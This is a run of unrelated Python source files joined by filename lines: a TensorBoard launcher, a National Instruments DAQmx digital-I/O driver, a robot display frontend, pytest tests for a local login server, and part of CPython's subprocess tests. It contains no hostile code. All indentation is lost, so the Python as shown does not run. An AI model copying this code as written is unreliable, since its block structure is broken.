s_input = squeezed_input_shape[i]
if s_input != -1 and s_data != s_input:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
daqmx.py
|
from collections import namedtuple
from fixate.core.common import ExcThread
# Basic Functions
from PyDAQmx import byref, DAQmxResetDevice, TaskHandle, numpy, int32, uInt8, float64, uInt64, c_char_p, uInt32
# Tasks
from PyDAQmx import DAQmxCreateTask, DAQmxStartTask, DAQmxWaitUntilTaskDone, DAQmxStopTask, DAQmxClearTask
# Channels
from PyDAQmx import DAQmxCreateDOChan, DAQmxCreateDIChan, DAQmxReadDigitalLines, DAQmxWriteDigitalLines, \
DAQmx_Val_GroupByScanNumber, DAQmx_Val_ChanPerLine, DAQmxReadCounterScalarF64, DAQmx_Val_Rising, DAQmx_Val_Seconds, \
DAQmxCfgSampClkTiming, DAQmx_Val_FiniteSamps
# Two Edge Separation
from PyDAQmx import DAQmxCreateCITwoEdgeSepChan, DAQmxSetCITwoEdgeSepFirstTerm, DAQmxGetCITwoEdgeSepFirstTerm, \
DAQmxSetCITwoEdgeSepSecondTerm, DAQmxGetCITwoEdgeSepSecondTerm, DAQmx_Val_Falling
# Signal Routing
from PyDAQmx import DAQmxConnectTerms, DAQmxDisconnectTerms, DAQmxTristateOutputTerm, DAQmx_Val_InvertPolarity, \
DAQmx_Val_DoNotInvertPolarity
from fixate.core.exceptions import InstrumentError, ParameterError
from fixate.drivers.daq.helper import DAQ
IORange = namedtuple('IORange', ['port', 'range_start', 'range_end'])
IORange.__new__.__defaults__ = (0, None, None)
IOLine = namedtuple('IOLine', ['port', 'line'])
IOLine.__new__.__defaults__ = (0, None)
class DaqTask:
"""
"""
task_state = ""
task = None
def read(self):
raise NotImplemented("Read not available for this Task")
def write(self, data):
raise NotImplemented("Write not available for this Task")
def trigger(self):
raise NotImplemented("Trigger not available for this Task")
def init(self):
"""
This method should be overridden to create the task
:return:
"""
def stop(self):
if self.task_state == "running":
DAQmxStopTask(self.task)
self.task_state = "stopped"
def clear(self):
self.stop()
if self.task_state != "":
DAQmxClearTask(self.task)
self.task = None
self.task_state = ""
def start(self):
if self.task_state == "running":
return
if self.task_state == "":
self.init()
DAQmxStartTask(self.task)
self.task_state = "running"
class DigitalOut(DaqTask):
"""
"""
def __init__(self, task_string, io_length):
self.io_length = io_length
self.task_string = task_string
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateDOChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
self.task_state = "init"
if self.task_state in ["init", "stopped"]:
self.start()
def read(self):
self.init()
data_arr = numpy.zeros(self.io_length, uInt8)
samples_per_chan = int32()
num_bytes_per_sample = int32()
DAQmxReadDigitalLines(self.task,
1, # Samples per channel
2.0, # Timeout
DAQmx_Val_GroupByScanNumber, # Interleaved
data_arr,
len(data_arr),
byref(samples_per_chan),
byref(num_bytes_per_sample),
None)
return data_arr
def write(self, data):
"""
Data must be an iterable like a list of 1s and 0s
Data is grouped by scan number. Each element in the array will write to each line in the digital output until
exhausted and then will start from the beginning for the next sample. Sample rate is as set in creating the IO
task.
"""
self.init()
try:
if len(data) % self.io_length:
raise ValueError("data must be a length divisible by {}".format(self.io_length))
data_arr = numpy.zeros(len(data), uInt8)
data_arr[:] = data
except TypeError:
if self.io_length != 1:
raise ValueError("data must be a list of length divisible by {}".format(self.io_length))
data_arr = numpy.zeros(1, uInt8)
data_arr[:] = [data]
written = int32()
DAQmxWriteDigitalLines(self.task,
len(data_arr) // self.io_length, # Samples per channel
1, # Autostart task
2.0, # Timeout
DAQmx_Val_GroupByScanNumber, # Interleaved
data_arr, written, None)
class DigitalIn(DaqTask):
"""
"""
def __init__(self, task_string, io_length):
self.io_length = io_length
self.task_string = task_string
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateDIChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
self.task_state = "init"
if self.task_state in ["init", "stopped"]:
self.start()
def read(self):
self.init()
data_arr = numpy.zeros(self.io_length, uInt8)
samples_per_chan = int32()
num_bytes_per_sample = int32()
DAQmxReadDigitalLines(self.task,
1, # Samples per channel
2.0, # Timeout
DAQmx_Val_GroupByScanNumber, # Interleaved
data_arr,
len(data_arr),
byref(samples_per_chan),
byref(num_bytes_per_sample),
None)
return data_arr
class BufferedWrite(DaqTask):
"""
"""
def __init__(self, task_string, io_length, frequency):
self.task_string = task_string
self.io_length = io_length
self.frequency = frequency
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateDOChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
self.task_state = "init"
def write(self, data):
"""
The task should be in stopped state when calling write, it automatically starts the task through the
DAQmxWriteDigitalLines call. When write is finished it is back in a stopped state
:param data:
:return:
"""
self.init()
try:
if len(data) % self.io_length:
raise ValueError("data must be a length divisible by {}".format(self.io_length))
except TypeError as e:
raise ValueError("data must be in an list divisible by {}".format(self.io_length)) from e
if len(data) == self.io_length:
# Sample clock only works for more than one sample so duplicate the sample
data = list(data)
data.extend(data)
DAQmxCfgSampClkTiming(self.task, None, float64(self.frequency), DAQmx_Val_Rising, DAQmx_Val_FiniteSamps,
uInt64(int(len(data) // self.io_length)))
try:
data_arr = numpy.zeros((len(data)), uInt8)
data_arr[:] = data
written = int32()
DAQmxWriteDigitalLines(self.task, int(len(data) // self.io_length), 1, -1,
DAQmx_Val_GroupByScanNumber, data_arr, written, None)
self.task_state = "running"
DAQmxWaitUntilTaskDone(self.task, -1)
if written.value != len(data) // self.io_length:
raise InstrumentError("Values not written correctly")
finally:
self.stop()
class TwoEdgeSeparation(DaqTask):
"""
DAQmxGetCITwoEdgeSepFirstTerm and DAQmxGetCITwoEdgeSepSecondTerm currently have a bug where if they are called
there is no way to create a new task unless the process is destroyed. Therefore there is no error checking on the
encoding of the terminal for the source and destination terminal. A validate terminals parameter has been added
but it should only be used once and as a debugging tool as it will prevent any future tasks being created
"""
_data = float64()
_trigger_thread = None
def __init__(self, device_name, counter_chan, min_val, max_val, first_edge_type, second_edge_type,
source_terminal, destination_terminal, validate_terminals=False):
self.device_name = device_name
self.counter_chan = counter_chan
self.min_val = min_val
self.max_val = max_val
self.first_edge_type = first_edge_type
self.second_edge_type = second_edge_type
self.source_terminal = source_terminal
self.destination_terminal = destination_terminal
self.validate_terminals = validate_terminals
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateCITwoEdgeSepChan(self.task, "{}/{}".format(self.device_name, self.counter_chan).encode(), b"",
float64(self.min_val), float64(self.max_val), DAQmx_Val_Seconds,
self.first_edge_type,
self.second_edge_type, b"")
if self.source_terminal:
tmp_data = c_char_p(self.source_terminal.encode())
DAQmxSetCITwoEdgeSepFirstTerm(self.task, "{}/{}".format(self.device_name, self.counter_chan).encode(),
tmp_data)
if self.validate_terminals:
tmp_data = c_char_p("".encode())
DAQmxGetCITwoEdgeSepFirstTerm(self.task,
"{}/{}".format(self.device_name, self.counter_chan).encode(),
tmp_data,
uInt32(16))
if self.destination_terminal not in tmp_data.value.decode('utf-8'):
raise InstrumentError(
"Destination terminal is set to {}, should be /{}/{}".format(tmp_data.value.decode('utf-8'),
self.device_name,
self.destination_terminal))
if self.destination_terminal:
tmp_data = c_char_p(self.destination_terminal.encode())
DAQmxSetCITwoEdgeSepSecondTerm(self.task, "{}/{}".format(self.device_name, self.counter_chan).encode(),
tmp_data)
if self.validate_terminals:
tmp_data = c_char_p("".encode())
DAQmxGetCITwoEdgeSepSecondTerm(self.task,
"{}/{}".format(self.device_name, self.counter_chan).encode(),
tmp_data,
uInt32(16))
if self.destination_terminal not in tmp_data.value.decode('utf-8'):
raise InstrumentError(
"Destination terminal is set to {}, should be /{}/{}".format(tmp_data.value.decode('utf-8'),
self.device_name,
self.destination_terminal))
self.task_state = "init"
def read(self):
self._trigger_thread.join(10)
if self._trigger_thread.exec_info:
try:
raise self._trigger_thread.exec_info
finally:
self._trigger_thread = None
self._trigger_thread = None
return self._data
def _read(self):
self.init()
return DAQmxReadCounterScalarF64(self.task, float64(10), byref(self._data), None)
def trigger(self):
if self._trigger_thread:
self.clear()
self._trigger_thread.stop()
self._trigger_thread.join(10)
if self._trigger_thread.is_alive():
raise InstrumentError("Existing Trigger Event in Progress")
self._trigger_thread = ExcThread(target=self._read)
self._trigger_thread.start()
class DaqMx(DAQ):
"""
Implements the digital input and output functions of the National Instruments DAQ
usage:
daq = DaqMx()
# Create a digital output from port 0 line 2 to line 4 named 'P0.2:4'
daq.create_digital_output('P0.2:4', port=0, range_start=2, length=3)
# Create a digital output with default port 0, at line 7 named 'reset'
daq.create_digital_output('reset', 7)
# Create a digital input at port 0 line 1
daq.create_digital_input('P0.1', range_start=1)
# This example assumes that port 0 line 1 is shorted to port 0 line 7 named reset
daq.start()
print("Port 7:", daq["reset"], "Echo Port:", daq["P0.1"])
>>>'Port 7: [0] Echo Port: [0]'
daq["P0.7"] = 1 # or True or '1' or [1]
print("Port 7:", daq["reset"], "Echo Port:", daq["P0.1"])
>>>'Port 7: [1] Echo Port: [1]'
print(daq["P0.2:4"])
>>>'[0 0 0]'
daq["P0.2:4"] = [0, 1, 0] # Need to assign all values if initialised as multiple
print(daq["P0.2:4"])
>>>'[0 1 0]'
daq.stop()
"""
def __init__(self):
self.device_name = "Dev1"
self.tasks = {}
self.reset()
self.triggers = {}
def reset(self):
DAQmxResetDevice(self.device_name.encode())
for _, task in self.tasks.items():
task.task_state = ""
def signal_route(self, source_terminal, destination_terminal, disconnect=False, tri_state=False, invert=False):
"""
Immediately routes a signal between two terminals
Set destination_terminal to '' if tri_state output is required on the source_terminal
terminals are PFI X as they are the programmable terminals.
See NI-MAX Device Routes for available terminal names.
Leave out the device name
eg. /Dev 1/PFI0 would be PFI0
"""
source_terminal = '/{}/{}'.format(self.device_name, source_terminal).encode()
destination_terminal = '/{}/{}'.format(self.device_name, destination_terminal).encode()
if disconnect:
DAQmxDisconnectTerms(source_terminal, destination_terminal)
elif tri_state:
DAQmxTristateOutputTerm(source_terminal)
else:
if invert:
invert = DAQmx_Val_InvertPolarity
else:
invert = DAQmx_Val_DoNotInvertPolarity
DAQmxConnectTerms(source_terminal, destination_terminal, invert)
def create_two_edge_separation(self, ident, counter_chan, min_val, max_val, first_edge_type, second_edge_type,
source_terminal=None, destination_terminal=None):
"""
Returns the two edge separation of two signals
:param ident:
Identification string used for reading the data via
daq = DaqMx()
daq.create_two_edge_separation(ident, **params)
daq.trigger_measurement(ident)
# Do stuff
# Read the edge separation after causing the event
edge_sep = daq[ident]
:param counter_chan:
For X-Series DAQs PCI
'ctr0', 'ctr1', 'ctr2', 'ctr3' where the connected terminals are:
Start = "AUX", Stop = "GATE"
ctr0 ctr1 ctr2 ctr3
Start: PFI 10 Pin45 Start: PFI 11 Pin46 Start: PFI 2 Pin43 Start: PFI 7 Pin38
Stop: PFI 9 Pin3 Stop: PFI 4 Pin41 Stop: PFI 1 Pin10 Stop: PFI 6 Pin5
:param min_val:
The minimum value, in units, that you expect to measure.
eg. 0.0001
:param max_val:
The maximum value, in units, that you expect to measure.
eg. 0.83
:param first_edge_type:
The start trigger on the first edge
"rising" or "falling"
:param second_edge_type:
The stop trigger on the second edge
"rising" or "falling"
:param source_terminal
:param destination_terminal
Override the default counter terminals.
eg.
ctr0
eg. source_terminal = "PFI14" will make the Start pin as PFI 14 in stead of 10
"""
if counter_chan not in ['ctr0', 'ctr1', 'ctr2', 'ctr3']:
raise ValueError("Invalid counter channel selected")
if first_edge_type.lower() == 'falling':
first_edge_type = DAQmx_Val_Falling
else:
first_edge_type = DAQmx_Val_Rising
if second_edge_type.lower() == 'falling':
second_edge_type = DAQmx_Val_Falling
else:
second_edge_type = DAQmx_Val_Rising
self.tasks[ident] = TwoEdgeSeparation(self.device_name, counter_chan, min_val, max_val, first_edge_type,
second_edge_type, source_terminal, destination_terminal)
def trigger_measurement(self, ident):
try:
self.tasks[ident].trigger()
except KeyError as e:
raise ValueError("{} is not a valid task".format(ident)) from e
def create_buffered_write(self, ident, frequency, *dio_ranges):
"""
Sets up the ranges to synchronize when writing to output at a specified frequency.
This will force each write to the output for this ident to contain the amount of samples specified.
eg.
>>>daq = DaqMx()
# Setup output @ 100Hz, 3 samples on port0 line 7 and 9
>>>daq.create_buffered_write("MyOutput", 100, (0, 7, 7), (0, 9, 9))
3 samples over 2 lines is 6 data values.
>>>daq["MyOutput"] = [0 ,0, 1, 1, 0, 1]
it is interleaved so it is written [line7, line9, line7, line9, line7, line9]
Requires ports that enable buffered writes.
In the X-Series daq this is port 0
This disables reading from the output port for these pins.
:param ident
The identification used to access this message
:param frequency
The sample frequency for writing
:type frequency integer or float
:param io_ranges
:type (port, line_start, line_end)
:param samples
The amount of samples that are required for each digital output write
"""
if ident in self.tasks:
raise ParameterError("Ident {} already used".format(ident))
do_channel, data_length = self._build_digital_task_string(*dio_ranges)
self.tasks[ident] = BufferedWrite(task_string=do_channel, io_length=data_length, frequency=frequency)
def _build_digital_task_string(self, *dio_ranges):
"""
:param dio_ranges:
each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
:return:
The string used to create the task by connecting each of the ports togeter
"""
data_length = 0
task_arr = []
for rng in dio_ranges:
task_arr.append(self.device_name + '/port{}/line{}:{}'.format(*rng))
data_length += rng[2] - rng[1] + 1 # range end - range start + 1
return ', '.join(task_arr).encode(), data_length
def create_digital_output(self, ident, *dio_ranges):
"""
:param dio_ranges
each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
A digital output is created in the order of the dio_ranges and can be accessed by the ident key.
>>>daq = DaqMx()
>>>rng_1 = IORange(0, 7, 9) # Port 0 line 7 to line 9
>>>rng_2 = IORange(0, 11,11) # Port 0 line 11
>>>daq.create_digital_output("MyOut", rng_1, rng_2)
>>>daq["MyOut"] = [0, 1, 0, 1] # Port 0 Line 8 and 11 high
>>>print(daq["MyOut"]) # Read back the value
>>>[0, 1, 0, 1]
"""
if ident in self.tasks:
raise ParameterError("Ident {} already used".format(ident))
task_string, data_length = self._build_digital_task_string(*dio_ranges)
self.tasks[ident] = DigitalOut(task_string, io_length=data_length)
def create_digital_input(self, ident, *dio_ranges):
"""
:param dio_ranges
each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
A digital output is created in the order of the dio_ranges and can be accessed by the ident key.
>>>daq = DaqMx()
>>>rng_1 = IORange(0, 7, 9) # Port 0 line 7 to line 9
>>>rng_2 = IORange(0, 11,11) # Port 0 line 11
>>>daq.create_digital_input("MyOut", rng_1, rng_2)
>>>print(daq["MyOut"]) # Tie Port 0 line 8 and line 11 high
>>>[0, 1, 0, 1]
"""
if ident in self.tasks:
raise ParameterError("Ident {} already used".format(ident))
task_string, data_length = self._build_digital_task_string(*dio_ranges)
self.tasks[ident] = DigitalIn(task_string, io_length=data_length)
def __getitem__(self, ident):
return self.read(ident)
def __setitem__(self, ident, data):
self.write(ident, data)
def write(self, ident, value):
try:
return self.tasks[ident].write(value)
except KeyError:
raise KeyError("{} is not a valid identifier".format(ident))
def read(self, ident):
try:
return self.tasks[ident].read()
except KeyError:
raise KeyError("{} is not a valid identifier\nAvailable tasks: {}".format(ident, sorted(self.tasks)))
def start_task(self, ident):
"""
:param ident:
:return:
"""
self.tasks[ident].start()
def stop_task(self, ident):
"""
Stops a task to be
:param ident:
:return:
"""
self.tasks[ident].stop()
def clear_task(self, ident):
"""
Stops a task and clear up the resources allocated to the
:param ident:
:return:
"""
self.tasks[ident].clear()
|
frontend.py
|
#!/usr/bin/env python3
# *************************************************************************
#
# Copyright (c) 2021 Andrei Gramakov. All rights reserved.
#
# This file is licensed under the terms of the MIT license.
# For a copy, see: https://opensource.org/licenses/MIT
#
# site: https://agramakov.me
# e-mail: mail@agramakov.me
#
# *************************************************************************
from logging import INFO
from psutil import WINDOWS as IS_WINDOWS
from typing import Union
import ast
import socket
import time
from brain_pycore.thread import StoppableThread
from brain_pycore.logging import new_logger
from brain_service_common.common_types import Status
from brain_service_common.constants import DEFAULT_BACKEND_HOST, DEFAULT_BACKEND_PORT
from .display import Display
class ZakharServiceFrontend:
ERROR_SYMBOL = "e"
WARNING_SYMBOL = "w"
def __init__(self, log_level=INFO) -> None:
self.log = new_logger("Front", log_level=log_level)
self.thread_main = None # type: Union[StoppableThread, None]
self.thread_reader = None # type: Union[StoppableThread, None]
self.display = Display(IS_WINDOWS)
self.markers = {"err": "", "warn": ""}
self.data = {}
self.socket = None
self.start()
def __del__(self):
self.stop()
def _connect(self):
self.log.info("Connecting ...")
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.settimeout(1)
self.socket.connect((DEFAULT_BACKEND_HOST, DEFAULT_BACKEND_PORT))
self.log.info("Connect!")
def _receive_backend_data(self):
if self.socket:
self.log.debug(f"Receiving...")
new_data_raw = self.socket.recv(1024).decode()
new_data = ast.literal_eval(new_data_raw)
self.data = new_data
self.log.debug(f"{self.data}")
def _reader_main(self):
while True:
try:
self._connect()
break
except ConnectionRefusedError:
t = 2
self.log.warn(f"Connection refused! Wait for {t} sec and retry...")
time.sleep(t)
while True:
try:
self._receive_backend_data()
except Exception as e:
# Print any error
self.log.error(str(e))
def _get_markers_str(self) -> str:
s = ""
for m in self.markers.values():
s += m
if s:
s = s + " | "
return s
def _show_errors_and_warns(self):
if self.data.get("err") and self.data["err"].keys():
self.markers["err"] = self.ERROR_SYMBOL
for err, msg in self.data["err"].items():
self.display.show_mm(f"{self.ERROR_SYMBOL} | Error: {err}", msg, 2)
else:
self.markers["err"] = ""
if self.data.get("warn") and self.data["warn"].keys():
self.markers["warn"] = self.WARNING_SYMBOL
for wrn, msg in self.data["warn"].items():
self.display.show_mm(f"{self.WARNING_SYMBOL} | Warn: {wrn}", msg, 1)
else:
self.markers["warn"] = ""
def _show_os_status(self):
os = self.data.get("os")
if os:
# self.display.show_sl(f"{self._get_markers_str()} Time:", os.get("time"), .5)
self.display.show_mm(f"{self._get_markers_str()}IP: {os.get('ip')}",
f"Net: {os.get('wifi_net')}", 1)
def _show_devices(self):
def _get_dev_str(devs) -> str:
d_str = ""
if devs and devs.keys():
for dev, val in devs.items():
if val == Status.ACTIVE:
val = "x"
elif val == Status.INACTIVE:
val = " "
elif val == Status.NA:
val = "/"
else:
val = "?"
d_str += f"{dev[0]}:[{val}] "
return d_str.strip()
dev = self.data.get("dev")
if dev:
self.display.show_mm(f"{self._get_markers_str()}Devices:",
_get_dev_str(self.data["dev"]), 1)
def _main_intro(self):
self.display.show_l("Hello!", 1)
self.display.show_l("I am Zakhar!", 1)
def _main_once(self):
self._show_errors_and_warns()
self._show_os_status()
self._show_devices()
def main(self):
self._main_intro()
while True:
self._main_once()
def start(self):
self.thread_reader = StoppableThread(target=self._reader_main)
self.thread_main = StoppableThread(target=self.main)
self.thread_main.start()
self.thread_reader.start()
def stop(self):
self.log.info("Terminating...")
if self.display:
self.display.show_l("Turn off", 1)
if self.thread_main:
self.thread_main.stop()
|
test_local_server.py
|
import threading
import requests
import pytest
from six.moves.urllib.parse import urlencode
from fair_research_login.local_server import LocalServerCodeHandler
from fair_research_login.exc import LocalServerError
class LocalServerTester:
def __init__(self, handler):
self.handler = handler
self.server_response = None
self.response = None
def _wait_for_code(self):
try:
self.server_response = self.handler.get_code()
except Exception as e:
self.server_response = e
def test(self, response_params):
"""
Start a local server to wait for an 'auth_code'. Usually the user's
browser will redirect to this location, but in this case the user is
mocked with a separate request in another thread.
Waits for threads to complete and returns the local_server response.
"""
with self.handler.start():
thread = threading.Thread(target=self._wait_for_code)
thread.start()
url = "{}/?{}".format(self.handler.get_redirect_uri(),
urlencode(response_params))
self.response = requests.get(url)
thread.join()
return self.server_response
def test_local_server_with_auth_code():
server = LocalServerTester(LocalServerCodeHandler())
assert server.test({"code": 'test_code'}) == 'test_code'
def test_local_server_with_error():
server = LocalServerTester(LocalServerCodeHandler())
response = server.test({"error": "bad things happened"})
assert isinstance(response, LocalServerError)
def test_local_server_with_custom_template():
template = 'HIGHLY CUSTOMIZED TEMPLATE'
server = LocalServerTester(LocalServerCodeHandler(template=template))
server.test({'code': 'test_code'})
assert server.response.text == template
# Test you don't need to pass $error in the template
server = LocalServerTester(LocalServerCodeHandler(template=template))
server.test({'error': 'a bad thing'})
assert server.response.text == template
def test_local_server_with_custom_template_vars():
template_vars = {
'defaults': {
'app_name': '', # Auto-populated if blank, but can be changed
'post_login_message': 'you are now logged in, congrats!',
'error': '', # Present if there is an error in Globus Auth
'login_result': ''
},
'error': {},
'success': {}
}
class MockNativeClient:
app_name = 'My Wicked Cool App'
local_server = LocalServerCodeHandler(template_vars=template_vars)
local_server.set_context(MockNativeClient)
server = LocalServerTester(local_server)
server.test({'code': 'test_code'})
assert (template_vars['defaults']['post_login_message'] in
server.response.text)
assert 'My Wicked Cool App' in server.response.text
def test_bad_template_vars():
tvars = {'defaults': {}}
with pytest.raises(ValueError):
server = LocalServerTester(LocalServerCodeHandler(template_vars=tvars))
server.test({'code': 'test_code'})
def test_missing_template_vars():
tvars = {'defaults': {'foo': 'bar'}, 'error': {}, 'success': {}}
with pytest.raises(KeyError):
server = LocalServerTester(LocalServerCodeHandler(template_vars=tvars))
server.test({'code': 'test_code'})
def test_access_server_before_started():
with pytest.raises(LocalServerError):
LocalServerCodeHandler().server
def test_server_timeout():
handler = LocalServerCodeHandler()
with handler.start():
handler.server.timeout = 1
with pytest.raises(LocalServerError):
handler.get_code()
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import signal
import io
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import gc
import textwrap
try:
import threading
except ImportError:
threading = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
